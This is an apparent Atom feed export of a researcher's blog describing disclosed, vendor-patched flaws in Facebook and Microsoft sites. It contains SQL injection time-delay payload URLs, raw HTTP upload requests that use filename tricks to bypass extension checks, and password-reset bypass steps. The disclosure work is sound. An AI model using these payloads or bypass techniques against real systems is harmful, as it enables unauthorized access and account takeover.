<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;D0EARno8cCp7ImA9WhBbFU8.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258</id><updated>2013-05-14T18:00:47.478+08:00</updated><category term="Adobe" /><category term="HP" /><category term="Twitter" /><category term="F-Secure" /><category term="Microsoft" /><category term="Symantec" /><category term="SQL Injection" /><category term="Password Reset" /><category term="Sybase" /><category term="CSRF" /><category term="Apache" /><category term="Trend Micro" /><category term="Apple" /><category term="XSS" /><category term="Oracle" /><category term="Facebook" /><category term="Arbitrary File Upload" /><category term="Directory Traversal" /><title>Sow Ching Shiong - Vulnerability Research</title><subtitle type="html">Sow Ching Shiong - Vulnerability Research</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://chingshiong.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>26</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/SowChingShiong-VulnerabilityResearch" /><feedburner:info uri="sowchingshiong-vulnerabilityresearch" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;CEcDQnY-eyp7ImA9WhNUFUk.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-543781823003964883</id><published>2013-01-07T15:01:00.001+08:00</published><updated>2013-01-07T15:01:13.853+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-07T15:01:13.853+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Password Reset" /><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><title>Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in&amp;nbsp;www.facebook.com,&amp;nbsp;which&amp;nbsp;can be exploited by an attacker to bypass certain security restrictions.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;In normal circumstances, an authenticated Facebook user is required to enter his/her current password on the change password page to prevent an unauthorized person from changing the password without the user's knowledge.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;However, an attacker can change/reset a user's password without knowing the user's current password by accessing this URL directly: &lt;a href="https://www.facebook.com/hacked"&gt;https://www.facebook.com/hacked&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;After that, the page will be redirected to &lt;a href="https://www.facebook.com/checkpoint/checkpointme?f=[userid]&amp;amp;r=web_hacked"&gt;https://www.facebook.com/checkpoint/checkpointme?f=[userid]&amp;amp;r=web_hacked&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Now, the attacker can click "Continue" to change/reset the user's password.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;Step 1: Logon to Facebook and access&amp;nbsp;&lt;/b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;this URL directly: &lt;a href="https://www.facebook.com/hacked"&gt;https://www.facebook.com/hacked&lt;/a&gt;. The page will be redirected to &lt;a href="https://www.facebook.com/checkpoint/checkpointme?f=[userid]&amp;amp;r=web_hacked"&gt;https://www.facebook.com/checkpoint/checkpointme?f=[userid]&amp;amp;r=web_hacked&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;a href="http://3.bp.blogspot.com/-a0iupJPuTHw/UOalk1AwoJI/AAAAAAAAAJ4/dl8V940Eb5Y/s1600/Step+1.png"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-a0iupJPuTHw/UOalk1AwoJI/AAAAAAAAAJ4/dl8V940Eb5Y/s400/Step+1.png" /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;Step 2: Click on "Continue" to proceed&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;a href="http://1.bp.blogspot.com/-We8JgQp9l-E/UOajruHWk-I/AAAAAAAAAJc/B44l1FLLsIQ/s1600/Step+2.png"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-We8JgQp9l-E/UOajruHWk-I/AAAAAAAAAJc/B44l1FLLsIQ/s400/Step+2.png" /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;Step 3: Enter "New Password" and "Confirm Password" to change/reset the password.&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-QC3HSYvuYug/UOamA-oK7bI/AAAAAAAAAKA/1jDzvZ4ifC8/s1600/Step+3.png"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-QC3HSYvuYug/UOamA-oK7bI/AAAAAAAAAKA/1jDzvZ4ifC8/s400/Step+3.png" /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Facebook Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Facebook White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://www.facebook.com/whitehat&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/2V739h3_u-4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/543781823003964883/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2013/01/facebook-bug-4-password-reset.html#comment-form" title="26 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/543781823003964883?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/543781823003964883?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/2V739h3_u-4/facebook-bug-4-password-reset.html" title="Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-a0iupJPuTHw/UOalk1AwoJI/AAAAAAAAAJ4/dl8V940Eb5Y/s72-c/Step+1.png" height="72" width="72" /><thr:total>26</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2013/01/facebook-bug-4-password-reset.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ANSXczcCp7ImA9WhJREEs.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-5779328458642369034</id><published>2012-07-12T10:44:00.001+08:00</published><updated>2012-07-12T10:56:38.988+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-07-12T10:56:38.988+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="Microsoft" /><title>Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability&amp;nbsp;in&amp;nbsp;careers.microsoft.com, which can be exploited by an attacker&amp;nbsp;to conduct Blind SQL injection attacks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept URLs which will cause a time delay of 25 seconds are provided below:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://careers.microsoft.com/Feed/Search.ashx?ss=xss&amp;amp;jc=all&amp;amp;pr=all&amp;amp;dv=1));WAITFOR DELAY '0:0:25'--&amp;amp;ct=all&amp;amp;rg=all&amp;amp;lang=en&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://careers.microsoft.com/Feed/Search.ashx?ss=xss&amp;amp;jc=all&amp;amp;pr=1));WAITFOR DELAY '0:0:25'--&amp;amp;dv=all&amp;amp;ct=all&amp;amp;rg=all&amp;amp;lang=en&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://careers.microsoft.com/search.aspx?ss=xss&amp;amp;jc=all&amp;amp;pr=all&amp;amp;dv=1));WAITFOR DELAY '0:0:25'--&amp;amp;ct=all&amp;amp;rg=all&amp;amp;lang=en&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://careers.microsoft.com/search.aspx?ss=xss&amp;amp;jc=all&amp;amp;pr=1));WAITFOR DELAY '0:0:25'--&amp;amp;dv=all&amp;amp;ct=all&amp;amp;rg=all&amp;amp;lang=en&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-oi6pkjlwUSE/T_45eEF8riI/AAAAAAAAAI0/nIs23g9VAIM/s1600/PoC+(careers.microsoft.com).png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-oi6pkjlwUSE/T_45eEF8riI/AAAAAAAAAI0/nIs23g9VAIM/s400/PoC+(careers.microsoft.com).png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Microsoft Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Microsoft White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://technet.microsoft.com/en-us/security/cc308575" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://technet.microsoft.com/en-us/security/cc308575&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/xn4Dhqe1_e0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/5779328458642369034/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/07/microsoft-bug-2-blind-sql-injection.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5779328458642369034?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5779328458642369034?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/xn4Dhqe1_e0/microsoft-bug-2-blind-sql-injection.html" title="Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-oi6pkjlwUSE/T_45eEF8riI/AAAAAAAAAI0/nIs23g9VAIM/s72-c/PoC+(careers.microsoft.com).png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/07/microsoft-bug-2-blind-sql-injection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIASXg6fCp7ImA9WhNUEkQ.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-4042603024783978581</id><published>2012-05-11T12:22:00.000+08:00</published><updated>2013-01-04T17:59:08.614+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-04T17:59:08.614+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Arbitrary File Upload" /><title>Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload&amp;nbsp;vulnerability&amp;nbsp;in&amp;nbsp;attachments.facebook.com,&amp;nbsp;which can be exploited by an attacker to compromise a victim's computer system.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;HTTP Request&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="font-family: 'Times New Roman';"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;===========&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;POST /ajax/messaging/upload.php HTTP/1.1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept: text/html, application/xhtml+xml, */*&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Language: en-US&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Encoding: gzip, deflate&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Host: attachments.facebook.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Length: 194182&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Proxy-Connection: Keep-Alive&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Pragma: no-cache&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cookie: [information removed]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------7db2e171a0068&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="post_form_id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------7db2e171a0068&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="fb_dtsg"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------7db2e171a0068&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------7db2e171a0068&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="attachment"; filename="..exe"&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: application/octet-stream&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-bBljM4D1kS4/T6ySQuwW6OI/AAAAAAAAAIo/crrwO4FLAe0/s1600/FB3.png"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-bBljM4D1kS4/T6ySQuwW6OI/AAAAAAAAAIo/crrwO4FLAe0/s400/FB3.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Facebook Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Facebook White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://www.facebook.com/whitehat&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/HTPW4zVnuJk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/4042603024783978581/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/05/facebook-bug-3-arbitrary-file-upload.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/4042603024783978581?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/4042603024783978581?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/HTPW4zVnuJk/facebook-bug-3-arbitrary-file-upload.html" title="Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-bBljM4D1kS4/T6ySQuwW6OI/AAAAAAAAAIo/crrwO4FLAe0/s72-c/FB3.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/05/facebook-bug-3-arbitrary-file-upload.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkIDSHo_fyp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-6135040875942474595</id><published>2012-05-03T17:17:00.001+08:00</published><updated>2012-05-11T14:42:59.447+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:42:59.447+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Arbitrary File Upload" /><title>Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload&amp;nbsp;vulnerability&amp;nbsp;in&amp;nbsp;attachments.facebook.com,&amp;nbsp;which can be exploited by an attacker to compromise a victim's computer system.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;HTTP Request&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="font-family: 'Times New Roman';"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;===========&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;POST /ajax/messaging/upload.php HTTP/1.1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Host: attachments.facebook.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Language: en-us,en;q=0.5&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Encoding: gzip, deflate&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;DNT: 1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Proxy-Connection: keep-alive&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cookie:&amp;nbsp;[information removed]&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: multipart/form-data; boundary=---------------------------265001916915724&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Length: 194200&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------265001916915724&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="post_form_id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------265001916915724&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="fb_dtsg"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------265001916915724&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------265001916915724&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="attachment"; filename="notepad.exe."&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: application/octet-stream&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://1.bp.blogspot.com/-4Z3s8eH9Kzw/T6JMn0K13zI/AAAAAAAAAIc/qDOVS5UKulk/s1600/FB2.png"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-4Z3s8eH9Kzw/T6JMn0K13zI/AAAAAAAAAIc/qDOVS5UKulk/s400/FB2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Facebook Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Facebook White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
